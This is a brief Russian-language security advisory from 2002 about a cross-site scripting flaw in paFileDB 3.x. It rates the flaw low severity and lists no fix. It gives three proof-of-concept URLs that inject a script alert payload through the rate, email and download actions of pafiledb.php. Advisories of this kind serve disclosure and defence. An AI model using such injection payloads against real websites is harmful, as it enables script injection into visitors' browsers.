Security Lab

Межсайтовый скриптинг в paFileDB

Дата публикации:23.10.2002
Всего просмотров:961
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: paFileDB 3.x
Описание: paFileDB (http://www.phparena.net/pafiledb/) – используется для создания базы данных загружаемых с сайта файлов. В нескольких модулях программы обнаружена возможность межсайтового скриптинга:
http://vuln/downloads/pafiledb.php?action=rate&id=4?"<scr!pt>alert('Testing')</script>"
http://vuln/downloads/pafiledb.php?action=email&id=4?"<scr!pt>alert('Testing')</script>"
http://vuln/downloads/pafiledb.php?action=download&id=4?"<scr!pt>alert('Testing')</script>"